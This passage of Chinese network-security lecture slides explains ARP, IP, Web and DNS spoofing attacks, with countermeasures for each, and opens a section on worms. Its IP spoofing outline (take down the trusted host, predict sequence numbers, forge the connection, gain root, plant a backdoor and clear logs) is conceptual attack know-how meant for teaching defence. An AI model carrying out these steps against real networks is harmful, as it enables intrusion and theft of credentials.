屏蔽掉。若黑客从某些端口发动攻击，用户可把这些端口屏蔽掉，以狙击入侵。最后一种比较折衷的方法是在路由器上滤掉ICMP。100六、欺骗攻击什么是欺骗攻击ARP欺骗攻击IP欺骗攻击Web欺骗攻击DNS欺骗攻击101六、欺骗攻击1.什么是欺骗攻击纯技术性利用了TCP/IP协议的缺陷不涉及系统漏洞较为罕见1994.12.25，凯文.米特尼克利用IP欺骗技术攻破了SanDiego计算中心1999年，RSASecurity公司网站遭受DNS欺骗攻击1998年，台湾某电子商务网站遭受Web欺骗攻击，造成大量客户的信用卡密码泄漏欺骗攻击的主要类型：ARP欺骗IP欺骗攻击Web欺骗攻击DNS欺骗攻击102六、欺骗攻击2.ARP欺骗攻击ABHacker当A与B需要通讯时：A发送ARPRequest询问B的MAC地址B发送ARPReply告诉A自己的MAC地址103六、欺骗攻击Meet-in-Middle:Hacker发送伪装的ARPReply告诉A，计算机B的MAC地址是Hacker计算机的MAC地址。Hacker发送伪装的ARPReply告诉B，计算机A的MAC地址是Hacker计算机的MAC地址。这样A与B之间的通讯都将先经过Hacker，然后由Hacker进行转发。于是Hacker可以捕获到所有A与B之间的数据传输（如用户名和密码）。这是一种典型的中间人攻击方法。104六、欺骗攻击Hi,我就是A啊Hi,我就是B啊ABHacker105六、欺骗攻击针对ARP欺骗攻击的预防措施安装入侵检测系统，检测ARP欺骗攻击MAC地址与IP地址绑定

arp–sIPMAC下载并安装Anti

ARP

Sniffer

等专杀工具在主机上安装诺顿等正版网络杀毒软件，并经常更新病毒库及时给系统、ＩＥ、交换设备打补丁内网用户设置强健的密码，不要随便共享文件，即使要共享文件也要设置好权限和密码，不要随便的点击ＱＱ、ＭＳＮ中发来链接，不要使用游戏的外挂程序，不要随便点击、下载邮件的附件安装使用网络防火墙关闭不必要的服务和共享106六、欺骗攻击3.IP欺骗.IP欺骗技术就是伪造某台主机的IP地址的技术。通过IP地址的伪装使得某台主机能够伪装另外的一台主机，而这台主机往往具有某种特权或者被另外的主机所信任。IP欺骗原理：理论依据(TCP/IP建立连接之前的三次握手)第一步：B----------SYN1---------A第二步：B-------SYN2+ACK1-------A第三步：B----------ACK2---------ASYN（数据序列）

ACK（确认标识）

ISN（连接初始值）

ACK1=SYN1+1SYN2=ISN2ACK2=SYN2+1107六、欺骗攻击IP欺骗过程ABZ互相信任DoS攻击探测ISN规律SYN(我是B，可以连接吗？)SYN|ACKACK(我是B，确认连接)108六、欺骗攻击攻击描述：屏蔽主机B。方法：Dos攻击，如Land攻击、SYN洪水攻击序列号采样和猜测。猜测ISN的基值和增加规律将源地址伪装成被信任主机，发送SYN数据请求建立连接等待目标主机发送SYN+ACK，黑客看不到该数据包再次伪装成被信任主机发送ACK，并带有预测的目标机的ISN+1建立连接，通过其它已知漏洞获得Root权限，安装后门并清除Log109六、欺骗攻击针对IP欺骗攻击的预防措施安装VPN网关，实现加密和身份认证；实施PKICA,实现身份认证；通信加密：是在通信时要求加密传输和通信和验证；抛弃基于地址的信任策略：是放弃以地址为基础的验证。不允许R*类远程调用命令的使用；删除rhosts文件；清空/etc/hostsequiv文件。110六、欺骗攻击4.Web欺骗攻击何谓Web欺骗？创造一个Web站点的映像，使得用户的连接被接入到Hacker的服务器，达到欺骗网络用户的目的。为什么会受到Web欺骗？监控网络用户；窃取帐户信息；损坏网站形象；失效SSL连接。111六、欺骗攻击Web欺骗的预防：浏览器状态显示连接为；鼠标连接目标提示；攻击者可以凭借JavaScript或VBScript修改以上信息；但可以通过禁止执行Script功能来揭露其面目；Sourcecode可以完全泄漏攻击者的信息112六、欺骗攻击5.DNS欺骗攻击当一个DNS服务器掉入陷阱，使用了来自一个恶意DNS服务器的错误信息，那么该DNS服务器就被欺骗了。DNS攻击途径：缓存感染：将数据放入一个没有设防的DNS服务器的缓存当中。这些缓存信息会在客户进行DNS访问时返回给客户，从而将客户引导到入侵者所设置的运行木马的Web服务器或邮件服务器上，然后黑客从这些服务器上获取用户信息。

113六、欺骗攻击DNS信息劫持入侵者通过监听客户端和DNS服务器的对话，通过猜测服务器响应给客户端的DNS查询ID。每个DNS报文包括一个相关联的16位ID号，DNS服务器根据这个ID号获取请求源位置。黑客在DNS服务器之前将虚假的响应交给用户，从而欺骗客户端去访问恶意的网站DNS重定向攻击者能够将DNS名称查询重定向到恶意DNS服务器。这样攻击者可以获得DNS服务器的写权限114六、欺骗攻击防范DNS欺骗攻击的措施直接用IP访问重要的服务，这样至少可以避开DNS欺骗攻击。但这需要你记住要访问的IP地址。加密所有对外的数据流，对服务器来说就是尽量使用SSH之类的有加密支持的协议，对一般用户应该用PGP之类的软件加密所有发到网络上的数据。115七、蠕虫病毒（Worm）概述蠕虫病毒（Worm）是计算机病毒的一种，通过网络传播，目前主要的传播途径有电子邮件、系统漏洞、聊天软件等。蠕虫病毒是病毒与黑客手段的结合，如红色代码、尼姆达病毒等。蠕虫病毒是传播最快的病毒种类之一，传播速度最快的蠕虫可以在几分钟之内传遍全球。蠕虫病毒要影响网络的带宽，不仅入侵了受害主机，甚至引起网络中断。116七、蠕虫病毒蠕虫病毒的传播途径系统漏洞：此病毒传播速度极快，如“震荡波”病毒，三天之内就感染了全球至少50万台计算机。预防：打好相应的系统补丁，可以应用瑞星杀毒软件的“漏洞扫描”工具聊天软件：“性感烤鸡”病毒就通过MSN